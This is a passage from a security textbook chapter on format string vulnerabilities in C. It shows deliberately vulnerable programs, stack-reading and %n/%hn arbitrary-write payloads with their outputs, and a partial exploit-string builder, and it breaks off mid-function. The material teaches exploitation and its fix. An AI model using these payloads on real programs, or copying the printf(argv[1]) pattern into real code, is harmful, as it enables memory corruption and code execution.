Note that, unlike the rest of the format specifiers, the %s, %p, and %n specifiers accept pointers
rather than the values themselves. The most important specifier for designing format string
exploits is %n, whose unique capabilities are discussed later.

Some functions that are not part of ANSI C can have nonstandard format specifiers. For example,
the syslog() function, in addition to the specifiers listed in Table 13.2, supports the nonstandard
%m specifier, which is replaced with the error message corresponding to the current value of the
errno variable.

Additional characters may be placed between the % character and the format specifier, in the
order in which they are listed here:


- The N$ qualifier (N is an integer greater than 0) specifies the position of the argument to be
  used from the list of arguments. This is a special qualifier, which is heavily used in format
  string exploits; its capabilities are considered later.

- Flags that modify the specifier (in any order):
  - The - flag indicates that the converted argument must be left-justified in the field.
  - The + flag indicates that numbers must always be output with a plus or minus sign. If this
    flag is not specified, positive numbers are output without the plus sign.
  - The space flag means that if the result of a signed conversion does not begin with a plus or
    minus sign, a space is prefixed to it. If both the space and + flags are specified, the space
    flag is ignored.
  - The 0 flag indicates that numbers must be padded with leading zeros to fill the entire field
    width.

- The # flag selects an alternative output form:
  - The first digit of an %o result is always 0.
  - A nonzero %x or %X result is always preceded by 0x or 0X.
  - An %e, %E, %f, %g, or %G result always contains a decimal point.
  - Trailing zeros are retained in %g and %G results.

- A number specifying the minimum field width means that the corresponding argument is output
  in a field at least that wide, and wider if necessary. If the converted argument has fewer
  characters than the field width, it is padded on the left if it is right-justified or on the
  right if it is left-justified. The padding characters are usually spaces (or zeros, if the
  zero-padding flag is given). The width can be specified directly with a decimal number or
  indirectly with an asterisk; in the latter case, it is taken from the next argument, which must
  be of the int type. With two asterisks (as in %*.*d), both the width and the precision are
  taken from arguments. A negative field width cannot be specified directly; if a negative width
  is supplied through an asterisk, it is interpreted as the - flag followed by a positive field
  width.

- A decimal point followed by a number specifies the precision, whose meaning depends on the
  specifier. For s, it is the maximum number of string characters to output. For e, E, and f, it
  is the number of digits output after the decimal point. For g and G, it is the number of
  significant digits. For d, i, o, u, x, and X, it is the minimum number of digits to output for
  an integer; the number is padded on the left with zeros to that width. The precision can be
  specified directly with a decimal number or indirectly with an asterisk, in which case it is
  taken from the next argument, which must be of the int type.

- The h, l, or L modifiers set the argument type. The h modifier indicates that the
  corresponding argument must be output as short or unsigned short; with the n specifier,
  h means a pointer to short. The l modifier indicates that the argument is of the long or
  unsigned long type; with the n specifier, l means a pointer to long. The L modifier
  indicates that the argument is of the long double type.


The operation of formatting functions is demonstrated in Listing 13.24, using the printf()
function as an example.
Listing 13.24. A formatting function (printf1.c)





#include <stdio.h>

int main()
{
    char *str = "sklyaroff";
    int num = 31337;

    printf("str = %s, addr_str = %p, num = %d, addr_num = %p\n",
           str, (void *)&str, num, (void *)&num);

    return 0;
}

Run the program, and you will obtain the following results:

# gcc printf1.c -o printf1
# ./printf1
str = sklyaroff, addr_str = 0xbffffa04, num = 31337, addr_num = 0xbffffa00

Before printf() gets control, its arguments are pushed onto the stack in reverse order, as the
standard C calling convention on 32-bit x86 requires. In the example, first the address of num is
pushed onto the stack, then the num value, then the address of the str pointer, then the str
pointer itself (the address of the string), and finally the address of the format string
(see Fig. 13.4).


Stack bottom (higher addresses)
  Address of num (&num) = 0xbffffa00
  Value of num = 31337
  Address of the str pointer (&str) = 0xbffffa04
  Value of the str pointer (the address of the string "sklyaroff")
  Address of the format string
Stack top (lower addresses)


Fig. 13.4. The stack frame formed by the printf() function


Then the printf() function parses the format string character by character. If the next
character is not a percent sign, it is simply copied to the output stream. (Control sequences
that begin with a backslash, listed in Table 13.1, have already been converted into the
corresponding characters by the compiler, so printf() receives, for example, an actual newline
character rather than \n.) A percent sign marks the beginning of a format specifier (see
Table 13.2). In this case, the function takes the next argument from the stack, transforms it as
instructed by the format specifier, and then outputs the result.

Understanding how formatting functions operate is necessary for developing format
string exploits.
13.3.2. Format String Vulnerability Example


The format string vulnerability is caused by simple carelessness or laziness on the part of
programmers. All it takes to create a vulnerability is to leave out the format string and pass
user-supplied data in its place, for example, writing printf(argv[1]) instead of
printf("%s", argv[1]). Consider the example shown in Listing 13.25.





Listing 13.25. A vulnerable program (printf2.c)





#include <stdio.h>

int main(int argc, char *argv[])
{
    int a = 3;
    char *str = "ivan";
    int b = 555;

    printf(argv[1]);    /* Vulnerable: user input used as the format string */

    return 0;
}





Compile, execute, and view the results: 

# gcc printf2.c -o printf2
# ./printf2 test
test

In the example, the printf() function is not given a format string of its own; it simply
receives an argument from the command line and outputs it to the screen.

At a glance, the program works perfectly. But see what happens when it is passed a string
containing format specifiers, as in the following example:

# ./printf2 %x%x%x%x%x
4000d9b040056420401509e440016b64bffffa9c

What are those numbers that the function outputs? Here, the printf() function treats the string
passed to it as a format string and parses it as described in the previous section. When the
printf() function is passed a string composed of regular characters, it simply outputs them to
the screen; however, when it encounters a format specifier, it takes an argument off the stack
and transforms it according to that specifier. But because no arguments were passed, the
function takes values that do not belong to it from the stack, starting from the top. This
peculiarity of the function's execution mechanism makes it possible to examine the entire
stack. For example, you can find the values 3 and 555 of the local variables a and b, which are
stored on the stack before the printf() function is called. This can be done using the %d format
specifier, which outputs a decimal number; enclosing a series of such specifiers in quotes allows
them to be separated with spaces:

# ./printf2 "%d %d %d %d %d %d %d %d %d %d"


1073797552 1074095136 1075120612 1073834852 -1073743220 -1073743320 555 134513928 3
-1073743272
Note that the order and location of values on the stack may differ from machine to machine, because they largely depend on the versions of GCC and of libraries such as libc.
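The mechanism can be illustrated with a small sketch: printf() has no way of knowing how many arguments the caller actually supplied, so it fetches one argument for every conversion it finds in the format string. The hypothetical helper count_conversions() below (not part of any library, and simplified: it ignores positional N$ specifiers) counts how many arguments a format string will try to fetch. For the string %x%x%x%x%x it reports 5, while printf2 passes none.

```c
#include <ctype.h>
#include <string.h>

/* Counts how many arguments a printf-style format string will fetch.
   Simplified sketch: handles flags, '*' width/precision, digits, length
   modifiers, and %%, but not positional (N$) specifiers. */
int count_conversions(const char *fmt)
{
    int args = 0;

    while (*fmt != '\0') {
        if (*fmt++ != '%')
            continue;                  /* ordinary character: printed as is */
        if (*fmt == '%') {             /* "%%" prints '%' and uses no argument */
            fmt++;
            continue;
        }
        while (*fmt != '\0' && strchr("-+ #0", *fmt))
            fmt++;                     /* flags */
        if (*fmt == '*') {             /* width taken from an argument */
            args++;
            fmt++;
        }
        while (isdigit((unsigned char) *fmt))
            fmt++;                     /* literal width */
        if (*fmt == '.') {
            fmt++;
            if (*fmt == '*') {         /* precision taken from an argument */
                args++;
                fmt++;
            }
            while (isdigit((unsigned char) *fmt))
                fmt++;                 /* literal precision */
        }
        while (*fmt != '\0' && strchr("hlLqjzt", *fmt))
            fmt++;                     /* length modifiers such as h, hh, l */
        if (*fmt != '\0') {            /* the conversion character itself */
            args++;
            fmt++;
        }
    }
    return args;
}
```

Note that %n also consumes an argument, which is exactly what the following sections exploit.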

A pointer to the string ivan must also be stored on the stack. It can be easily found ex- 
perimentally by sequentially using the %s specifier in different places: 

# ./printf2 "%x %x %x %x %x %x %x %s"

4000d9b0 40056420 401509e4 40016b64 bffffa7e bffffa18 22b ivan

In this way, the stack can be easily examined from top to bottom. But what if you want to 
view, for example, the hundredth or thousandth value in the stack? Entering 100 or 1,000 
format specifiers in the command line would be rather tedious, to say the least. In this case, 
the necessary command can be entered as follows: 

# ./printf2 `perl -e 'print "%x,"x50'`

4000d9b0,40056420,401509e4,40016b64,bffffa1c,bffff9a8,22b,8048508,3,bffff9d6,
40042177,2,bffffa0c,bffffa18,80482fa,80484e0,0,bffff9d8,40042161,0,bffffa18,4014f4dc,
400165f8,2,8048360,0,8048381,8048460,2,bffffa1c,80482e4,80484e0,40008184,bffff9fc,
40016bc0,40001e01,bffffa18,2,bffffb1c,bffffb24,0,bffffbbb,bffffbc5,bffffbe4,bffffbfc,
bffffc1e,bffffc2a,bffffc34,bffffdf7,bffffe1f,

Here, a Perl command is used to place 50 comma-delimited %x format specifiers in the command line. This method, however, is not suitable for use in exploits. A better and simpler way of directly accessing the necessary parameter on the stack is to use the N$ qualifier. For example, the %N$u specifier outputs the Nth parameter as an unsigned decimal integer. Consider the following statement:

printf("2nd: %2$c, 5th: %5$c, 4th: %4$x\n", 'A', 'B', 'C', 'D', 'E');


It produces this output:

2nd: B, 5th: E, 4th: 44

The first format specifier, %2$c, outputs the second argument after the format string, which is the B character. The second specifier, %5$c, outputs the fifth argument, the E character. The last specifier, %4$x, outputs the fourth argument in hexadecimal format (44 is the hexadecimal ASCII code for the D character).
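Positional specifiers work with the other format functions as well. The following sketch (the name swap_words() is hypothetical) uses them with snprintf() to print two arguments in reverse order. Numbered arguments are a POSIX extension supported by glibc rather than part of ISO C, and when they are used, every conversion in the format string should be numbered.

```c
#include <stdio.h>

/* Writes "<second> <first>" into out and returns the length snprintf reports.
   %2$s picks the second argument after the format string, %1$s the first. */
int swap_words(char *out, size_t size, const char *first, const char *second)
{
    return snprintf(out, size, "%2$s %1$s", first, second);
}
```

For example, swap_words(buf, sizeof buf, "world", "hello") leaves "hello world" in buf.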

In the same vein, the 50th value in the stack can be accessed as follows: 

# ./printf2 %50\$x

bffffe1f

The backslash escapes the $ character to prevent the shell from interpreting it. 

As you can see, the direct access method is simple to implement and works like clockwork. 

If the printf() function in the printf2 program (Listing 13.25) were given a format string of its own, for example, printf("%s", argv[1]), walking the stack would be impossible, because there would be no format string vulnerability.
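The fix is simply to keep untrusted data out of the format argument. The sketch below (copy_untrusted() is a hypothetical name) passes the text through a constant "%s" format, so any % characters it contains are copied literally instead of being interpreted. GCC can also flag the vulnerable pattern at compile time: with -Wformat -Wformat-security it warns about calls such as printf(argv[1]) whose format is not a string literal and that have no format arguments.

```c
#include <stdio.h>

/* Copies untrusted text into out without interpreting it as a format:
   the only format string is the constant "%s". Returns the text length. */
int copy_untrusted(char *out, size_t size, const char *untrusted)
{
    return snprintf(out, size, "%s", untrusted);
}
```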


13.3.3. Using the %n Format Specifier to Write 
to an Arbitrary Address 


The information presented in the preceding section is sufficient to view the stack; however, to write an exploit, you must be able to write to a chosen memory location (e.g., to overwrite a function return address).
This task can be accomplished with the help of the %n format specifier. As you should recall, it writes the number of characters output so far into the integer that its argument points to (see Table 13.2). Consider a few examples to learn what can be accomplished using this specifier.

Listing 13.26 shows a program that outputs the ten-character string ABCDEFGHIJ and uses the %n format specifier to write the number of characters output (10) into a variable named n.





Listing 13.26. Using the %n format specifier (printf3.c)





#include <stdio.h>

int main()
{
    int n;

    /* %n stores the number of characters printed so far (10) in n */
    printf("ABCDEFGHIJ%n\n", &n);
    printf("n=%d\n", n);

    return 0;
}


Compile, execute, and view the results: 


# gcc printf3.c -o printf3
# ./printf3
ABCDEFGHIJ
n=10
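The same behavior can be checked without printing anything. The sketch below (count_before_n() is a hypothetical name) formats the string into a local buffer with snprintf() and returns what %n stored. It assumes glibc or another C library that still honors %n; some libraries, such as Microsoft's C runtime by default, reject it.

```c
#include <stdio.h>

/* Formats "ABCDEFGHIJ" into a local buffer and returns the count that %n
   stored: the number of characters produced before the %n (here 10). */
int count_before_n(void)
{
    char out[32];
    int n = 0;

    snprintf(out, sizeof out, "ABCDEFGHIJ%n", &n);
    return n;
}
```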


The example shown in Listing 13.27 demonstrates how the number of bytes output before the %n specifier can be controlled.





Listing 13.27. Controlling the number of bytes output before the %n specifier (printf4.c)





#include <stdio.h>

int main()
{
    int n, x = 1;

    /* %.100d prints x as 100 digits, so n becomes 10 + 100 = 110 */
    printf("ABCDEFGHIJ%.100d%n\n", x, &n);
    printf("n=%d\n", n);

    return 0;
}





Compile, execute, and view the results: 


# gcc printf4.c -o printf4
# ./printf4
ABCDEFGHIJ0000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000001

n=110
In the example, I used the %.100d precision parameter (a number following a decimal point) to print 100 characters, which are added to the 10 characters of the ABCDEFGHIJ string and written to the n variable. Instead of the precision parameter, the %100d minimum field width parameter (a number without a point) can be used; in this case, 99 spaces followed by 1 will be output instead of 99 zeros followed by 1. Zeros can be output by placing the 0 flag before the field width value: %0100d.
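A sketch of the field-width variant: the hypothetical padded_count() below prints ABCDEFGHIJ and then the number 1 padded with zeros to width characters (the width is passed through *, so padded_count(100) behaves like %0100d) and returns the count %n stores. It assumes width stays below 200 so the whole output fits in the local buffer, and a C library that honors %n.

```c
#include <stdio.h>

/* Returns 10 + width when 1 <= width < 200: the 10 letters plus the
   zero-padded field produced by the 0 flag and a '*' field width. */
int padded_count(int width)
{
    char out[256];
    int n = 0;

    snprintf(out, sizeof out, "ABCDEFGHIJ%0*d%n", width, 1, &n);
    return n;
}
```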

Now let's learn to write to specific addresses. Listing 13.28 shows a practice program for this purpose.





Listing 13.28. A vulnerable program (format.c) 





#include <stdio.h>

int main(int argc, char *argv[])
{
    int a = 1;
    char buf[100];
    int b = 1;

    printf("a = %d (%p)\n", a, (void *) &a);
    printf("b = %d (%p)\n", b, (void *) &b);

    /* Vulnerable: argv[1] is used as the format string */
    snprintf(buf, sizeof buf, argv[1]);
    printf("\nbuf: [%s]\n\n", buf);

    printf("a = %d (%p)\n", a, (void *) &a);
    printf("b = %d (%p)\n", b, (void *) &b);

    return 0;
}





Run the program, and you can view the results: 
# ./format "%x %x %x %x"
a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)

buf: [40017098 4003087c 40017098 40000816]

a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)


The snprintf() function in Listing 13.28 is called without a format string of its own (argv[1] is used as the format), so the program has a format string vulnerability. This vulnerability will be used to change the values of the a and b variables. While the program runs, the a and b variables are stored on the stack. To overwrite them with new values, you need to know their addresses on the stack. To keep the experiment simple, I included printf() calls in the program that use the %p format specifier to show the addresses of both variables. In real programs, no one will show you any addresses. More printf() calls are placed after the snprintf() call; these show the changed values of the variables and the contents of the buf buffer.

First the value of the a variable will be changed, and then the value of the b variable. Consider the theory of how this is done.
As you already know, the %n format specifier writes to the address (a pointer) that it obtains from the stack. Therefore, the address of the variable to change must be placed on the stack so that it can then be passed to the %n format specifier as a pointer. Executing the program reveals that the address of the a variable is 0xbffffa0c. This value is placed on the stack in the following form: \x0c\xfa\xff\xbf. The byte order must be reversed because the x86 architecture stores values in memory in little-endian format, that is, lower bytes are stored at lower addresses. This address will be the first item in the string passed to the vulnerable program. The snprintf() function will copy the address passed to it into the buf[100] buffer, which is on the stack. Just placing the address on the stack, however, is not enough; it must also be located there so that it can be passed to the %n format specifier. In other words, you must travel through the stack to the location at which the \x0c\xfa\xff\xbf address is stored, after which the %n specifier will write a new value at this address. The most convenient way of traveling through the stack is to access it directly using the N$ qualifier.
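The byte reversal can be expressed in a few lines of C. The sketch below (to_little_endian() is a hypothetical helper) computes the bytes arithmetically, so it produces the x86 memory order regardless of the machine it runs on; for 0xbffffa0c it yields 0c fa ff bf, the \x0c\xfa\xff\xbf sequence used above.

```c
#include <stdint.h>

/* Stores value in out[] least significant byte first (little-endian order). */
void to_little_endian(uint32_t value, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char) (value >> (8 * i));   /* byte i of value */
}
```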

Change the value of the a variable to 100. This value can be specified using the precision 
(a number following a point) or the minimum field width (a number) in the format specifier. 

Taking this theory into account, prepare a string and pass it to the program: 

# ./format `printf "\x0c\xfa\xff\xbf"`%.96x%1\$n

a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)

buf:
[????00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000004001709]

a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)
Segmentation fault (core dumped)

As you can see, the attempt to change the value of the variable was not successful: the program crashed and dumped core. This happened not because of any fundamental flaw in the approach but simply because the %1$n specifier did not reach the location on the stack where the \x0c\xfa\xff\xbf address was placed; instead, %n used some other stack value as a pointer and wrote to whatever address it contained, thereby crashing the program. The format string passed to the vulnerable program is designed correctly. Consider its main elements:


❑ `printf "\x0c\xfa\xff\xbf"`: To have the address of the variable interpreted as 4 raw bytes and not as a regular string, the printf shell command enclosed in backquotes (accent-grave marks) is used.

❑ %.96x: This specifier is needed only to set the number of bytes to write to the variable. Because the value 100 is supposed to be written and the 4 address bytes at the start of the string are also counted, the .96 precision is set. The type of the specifier does not matter; the important thing is that it be a type that works with integers: d, i, u, o, x, or X.

❑ %1\$n: The %n format specifier is given with the N$ qualifier. Increment the value of the qualifier, starting with 1, until the address of the variable is found on the stack. When the address is found, the %n specifier will overwrite the value of the a variable with the new value of 100:
# ./format `printf "\x0c\xfa\xff\xbf"`%.96x%2\$n
a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)
Segmentation fault (core dumped)


# ./format `printf "\x0c\xfa\xff\xbf"`%.96x%3\$n
a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)

buf:
[????00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000004001709]

a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)
Segmentation fault (core dumped)


# ./format `printf "\x0c\xfa\xff\xbf"`%.96x%4\$n
a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)
Segmentation fault (core dumped)


# ./format `printf "\x0c\xfa\xff\xbf"`%.96x%5\$n
a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)
Segmentation fault (core dumped)


# ./format `printf "\x0c\xfa\xff\xbf"`%.96x%6\$n
a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)

buf:
[????00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000004001709]

a = 100 (0xbffffa0c)
b = 1 (0xbffff98c)

Bingo! On my machine, the variable is overwritten when the value of the qualifier is 6; 
the value on your machine may be different. 

In the same manner, the value of the b variable is overwritten with 31337. Simply place the address of the b variable, \x8c\xf9\xff\xbf, in the string and set the precision to 31333 (31,337 minus the 4 address bytes). The N$ qualifier does not need to be searched for again; its value remains the same:

# ./format `printf "\x8c\xf9\xff\xbf"`%.31333x%6\$n

a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)

buf:
[????00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000]

a = 1 (0xbffffa0c)
b = 31337 (0xbffff98c)
In the preceding examples, variables were overwritten with relatively small values; however, real exploits must write much larger numbers, and %n can only write a number equal to the count of characters actually output. For example, function return addresses, as a rule, exceed 100 million when expressed in decimal. Take a typical address value of 0x8048360 (134,513,504 in decimal). Write this value into the a variable:

# ./format `printf "\xfc\xf9\xff\xbf"`%.134513500x%6\$n

a = 1 (0xbffff9fc)
b = 1 (0xbffff97c)

buf:
[????00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000]

a = 134513504 (0xbffff9fc)
b = 1 (0xbffff97c)

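You may have to run the program twice to correct the variable's address: because the command-line argument is longer, the stack shifts, so the first run shows the new address, which you then use in the second run. In my case, it moved to address 0xbffff9fc.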

It took my machine, a 1.7 GHz Pentium 4, about 5 seconds to write the value; older ma- 
chines may take many minutes. Moreover, writing such a large value requires about 128 MB 
of memory! 

Real exploits employ techniques that reduce memory usage, which in turn reduces the execution time. Two such methods are known:

❑ Writing the offset
❑ Using the h modifier

Consider both of these methods.


13.3.4. Writing the Offset 


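The essence of the offset-write method is that the value is formed sequentially, byte by byte. For example, the value 0xAABBCCDD is written to address x in four operations:

❑ 0x000000DD is saved at address x
❑ 0x000000CC is saved at address x + 1
❑ 0x000000BB is saved at address x + 2
❑ 0x000000AA is saved at address x + 3

Each %n stores a full 4-byte integer, but every subsequent write starts one byte higher and overwrites the three zero bytes left by the previous one, so only the low byte of each write survives in the final value.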


The upshot is a value written to the memory in the little-endian format: lower bytes at 
lower addresses, which is the x86 architecture rule (Fig. 13.5). 

Using the previous example (Listing 13.28), change the value of the a variable to 0xf0c67318 using the offset-write method. According to the method, the following four operations must be performed:

❑ 0x00000018 is saved at address 0xbffff9fc
❑ 0x00000073 is saved at address 0xbffff9fd
❑ 0x000000c6 is saved at address 0xbffff9fe
❑ 0x000000f0 is saved at address 0xbffff9ff
Fig. 13.5. Offset-write method (panels: addresses; first, second, third, and fourth writes; result)


Now build a format string and pass it to the vulnerable program: 


# ./format `printf "\xec\xf9\xff\xbf\xed\xf9\xff\xbf\xee\xf9\xff\xbf\xef\xf9\xff\xbf"`%.8x%6\$n%.91x%7\$n%.83x%8\$n%.42x%9\$n

a = 1 (0xbffff9ec)
b = 1 (0xbffff96c)

buf:
[????????????????4001709800000000000000000000000000000000000000000000000000000000
0000000000000000000]

a = -255429864 (0xbffff9ec)
b = 1 (0xbffff96c)

As before, you may have to run the program twice to correct the variable's address. In my case, it moved to address 0xbffff9ec.

Read as an unsigned 32-bit number in hexadecimal, the signed value -255429864 is 0xf0c67318.

The function performed by each of the format string elements is as follows: 


❑ `printf "\xec\xf9\xff\xbf\xed\xf9\xff\xbf\xee\xf9\xff\xbf\xef\xf9\xff\xbf"`: First, four consecutive addresses are placed on the stack (in the buf buffer). To have the addresses interpreted as sequences of bytes and not as a regular string, the printf shell command enclosed in backquotes is used.

❑ %.8x%6\$n: The value 0x00000018 is written to address 0xbffff9ec. Because the four addresses at the start of the string take 16 bytes, the precision option (%.8x) is used to output an additional 8 bytes, for a total of 24 bytes (18h).

❑ %.91x%7\$n: 0x00000073 is written to 0xbffff9ed (24 + 91 = 115 = 73h).

❑ %.83x%8\$n: 0x000000c6 is written to 0xbffff9ee (115 + 83 = 198 = c6h).

❑ %.42x%9\$n: 0x000000f0 is written to 0xbffff9ef (198 + 42 = 240 = f0h).
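The precision values above follow from simple arithmetic: each byte of the target value, taken least significant first, minus the number of characters already output. The hypothetical helper offset_write_paddings() below computes them and fails when a byte is not larger than the running count, which is the limitation discussed next. It is a simplified sketch: it does not account for %.Nx printing more than N characters when the consumed argument needs more hex digits, so small paddings need care in practice.

```c
#include <stdint.h>

/* Fills pad[0..3] with the precisions for the four %n writes of the
   offset-write method. already is the number of characters output before
   the first write (16 for four 4-byte addresses). Returns 0 on success, or
   -1 if the bytes of value do not increase, so the method cannot be used. */
int offset_write_paddings(uint32_t value, unsigned already, unsigned pad[4])
{
    unsigned count = already;

    for (int i = 0; i < 4; i++) {
        unsigned byte = (value >> (8 * i)) & 0xff;  /* least significant first */
        if (byte <= count)
            return -1;
        pad[i] = byte - count;   /* characters to add before this %n */
        count = byte;            /* %n counts everything printed so far */
    }
    return 0;
}
```

For 0xf0c67318 with 16 bytes of addresses, it yields 8, 91, 83, and 42, matching the format string above; for 0x8048360 it returns -1.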


As you can see, the offset-write method not only works but works quickly and requires little memory. However, it has a significant limitation: the values written by the format string can only increase, because the %n format specifier counts all characters output up to that point. The method works for 0xf0c67318 (18h < 73h < c6h < f0h), but, for example, the number 0x8048360 (bytes 60h, 83h, 04h, 08h) cannot be written this way as shown, because its third and fourth bytes are smaller than the second. Therefore, format string exploits usually employ the second method, using the h modifier, which circumvents this limitation of the offset method.


13.3.5. Using the h Modifier 


By default, the %n specifier expects a pointer to an int, so it writes 4 bytes. But as you may recall from the description of the format string, when the h modifier is used with the %n specifier, the corresponding argument is treated as a pointer to a short. Thus, the %hn specifier writes only 2 bytes (a short int) at the target address. Consequently, the h modifier method allows the number to be written to be split into two halves. The maximum value of a single half is 0xffff (65,535 in decimal), and producing that many characters takes little time and memory. For example, only two operations have to be performed to write the number 0xAABBCCDD to address x using the h modifier method:


❑ 0xCCDD is saved at address x
❑ 0xAABB is saved at address x + 2
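The effect of the h modifier can be observed on an ordinary variable. In the sketch below (write_low_half() is a hypothetical name), %hn stores a character count into one 16-bit half of a 32-bit word, and the other half is left untouched. It assumes a little-endian machine such as x86, where half[0] overlays the least significant 16 bits, and a C library that honors %n.

```c
#include <stdint.h>
#include <stdio.h>

/* Writes count (which must be below 4096) into the low 16-bit half of a
   32-bit word with %hn and returns the whole word. On little-endian
   machines, write_low_half(0xAAAAAAAA, 0x804) returns 0xAAAA0804. */
uint32_t write_low_half(uint32_t initial, int count)
{
    union {
        uint32_t word;
        short half[2];
    } u;
    char out[4096];

    u.word = initial;
    /* %.*d prints 0 as exactly count digits, then %hn stores count
       through a short pointer, so only 2 of the 4 bytes change. */
    snprintf(out, sizeof out, "%.*d%hn", count, 0, &u.half[0]);
    return u.word;
}
```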


Taking the example program from Listing 13.28, use the h modifier method to change the value of the b variable to 0x8048360. According to the method, the following two operations must be performed:


❑ 0x8360 is saved at 0xbffff98c
❑ 0x0804 is saved at 0xbffff98c + 2 = 0xbffff98e


However, the smaller of the two numbers must be written first, because the %n format specifier counts all characters output so far; that is, the values written by the format string can only increase. Thus, first the value 0x0804 = 2,052 is saved, and then 0x8360 = 33,632.

Now build a format string and pass it to the vulnerable program: 

# ./format `printf "\x8e\xf9\xff\xbf\x8c\xf9\xff\xbf"`%.2044x%6\$hn%.31580x%7\$hn

a = 1 (0xbffffa0c)
b = 1 (0xbffff98c)

buf:
[????????00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000]

a = 1 (0xbffffa0c)
b = 134513504 (0xbffff98c)
The number 134,513,504 in the hexadecimal format is 0x8048360. 
The function performed by each of the format string elements is as follows: 

❑ `printf "\x8e\xf9\xff\xbf\x8c\xf9\xff\xbf"`: Places both addresses on the stack. The address that receives the smaller value comes first.

❑ %.2044x%6\$hn: Writes 0x0804 = 2,052 to address 0xbffff98e. The precision is set to .2044 because the two addresses take 8 bytes (2,052 - 8 = 2,044).

❑ %.31580x%7\$hn: Writes 0x8360 = 33,632 to address 0xbffff98c. The precision is set to .31580 because 33,632 - 2,052 = 31,580.
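The two precisions and the order of the writes can be computed mechanically. The hypothetical helper hn_paddings() below splits the value into 16-bit halves, writes the smaller half first, and subtracts the characters already output (8 for the two addresses); frmstr_builder() in the next section performs the same calculation. It assumes the smaller half is larger than already.

```c
#include <stdint.h>

/* Computes the precisions for the two %hn writes. *high_first is set to 1
   when the high half is smaller and must therefore be written first. */
void hn_paddings(uint32_t value, unsigned already,
                 unsigned *first_pad, unsigned *second_pad, int *high_first)
{
    unsigned high = value >> 16;        /* e.g. 0x0804 */
    unsigned low = value & 0xffff;      /* e.g. 0x8360 */
    unsigned smaller = high < low ? high : low;
    unsigned larger = high < low ? low : high;

    *high_first = high < low;
    *first_pad = smaller - already;     /* 0x0804 - 8 = 2044 */
    *second_pad = larger - smaller;     /* 0x8360 - 0x0804 = 31580 */
}
```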


The information presented thus far is sufficient for writing a format string exploit. 


13.3.6. Creating a Format String Automatically 


A format string exploit must build a format string and then pass it to the vulnerable application. So you need a function that automatically forms a format string from the values passed to it. Call this function frmstr_builder().

The format string has the following structure: 

"[address][address+2]%.[min value - 8]x%[offset]$hn%.[max value - min value]x%[offset+1]$hn"


To build the format string, the frmstr_builder() function takes only three arguments:

❑ addr: The address to which the value is written
❑ value: The value to write (in the exploit, this value will be the shellcode's address)
❑ pos: The position (the N$ index, in words) at which the start of the vulnerable buffer is found on the stack


First, the function must break down the address into individual bytes to place them in 
the format string in the little-endian format (the least significant byte at the lowest address). 
This task is carried out by the following four statements: 

byte1 = (addr & 0xff000000) >> 24;
byte2 = (addr & 0x00ff0000) >> 16;
byte3 = (addr & 0x0000ff00) >> 8;
byte4 = (addr & 0x000000ff);

Then, the most significant and the least significant 16-bit halves of the value must be extracted. This is done using these statements:

high = (value & 0xffff0000) >> 16;
low = (value & 0x0000ffff);

The format string is built differently depending on which of the two halves, high or low, is smaller, because, as already mentioned, values in the format string can only increase.

The format string is built in the buf buffer, a pointer to which is returned by the function. 

To allow debugging, I placed fprintf(stderr, "...") statements in the code to observe 
different values. 

To check the frmstr_builder() function operation, use it in a simple program named frmbuilder.c (Listing 13.29). The program simply receives three arguments from the command line (the address, value, and offset), passes them to the frmstr_builder() function, and then outputs the string formatted by the function.

Compile, execute, and view the results: 

# gcc frmbuilder.c -o frmbuilder
# ./frmbuilder bffff98c 8048360 6
addr: 0xbffff98c
byte1: 0xbf (?)
byte2: 0xff (?)
byte3: 0xf9 (?)
byte4: 0x8c (?)
byte4+2: 0x8e (?)
value: 134513504 (0x8048360)
high: 2052 (0x804)
low: 33632 (0x8360)
pos: 6
buf: [????????%.2044x%6$hn%.31580x%7$hn] (33)


Backquotes can be used in the command line to let frmbuilder supply these values automatically, instead of entering them manually as in the previous examples. For example, here is how the value of the b variable in the vulnerable format program (Listing 13.28) can be overwritten:


# ./format `./frmbuilder bffff97c 8048360 6`
addr: 0xbffff97c
byte1: 0xbf (?)
byte2: 0xff (?)
byte3: 0xf9 (?)
byte4: 0x7c (|)
byte4+2: 0x7e (~)
value: 134513504 (0x8048360)
high: 2052 (0x804)
low: 33632 (0x8360)
pos: 6
buf: [~???|???%.2044x%6$hn%.31580x%7$hn] (33)

a = 1 (0xbffff9fc)
b = 1 (0xbffff97c)

buf:
[~???|???00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000]

a = 1 (0xbffff9fc)
b = 134513504 (0xbffff97c)

I had to run the program twice to correct the address of the b variable.





Listing 13.29. Building the format string automatically (frmbuilder.c) 





#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Builds a format string that writes value to addr with two %hn writes.
   pos is the N$ position at which the start of the buffer is found. */
char *frmstr_builder(unsigned long addr, unsigned long value, int pos)
{
    char *buf;
    unsigned char byte1, byte2, byte3, byte4;
    unsigned long high, low;
    int length = 100;

    /* Split the target address into bytes */
    byte1 = (addr & 0xff000000) >> 24;
    byte2 = (addr & 0x00ff0000) >> 16;
    byte3 = (addr & 0x0000ff00) >> 8;
    byte4 = (addr & 0x000000ff);

    /* Split the value into its 16-bit halves */
    high = (value & 0xffff0000) >> 16;
    low = (value & 0x0000ffff);

    /* Debugging output goes to stderr so it does not mix with the result */
    fprintf(stderr, "addr: %#lx\n", addr);
    fprintf(stderr, "byte1: %#x (%c)\n", byte1, byte1);
    fprintf(stderr, "byte2: %#x (%c)\n", byte2, byte2);
    fprintf(stderr, "byte3: %#x (%c)\n", byte3, byte3);
    fprintf(stderr, "byte4: %#x (%c)\n", byte4, byte4);
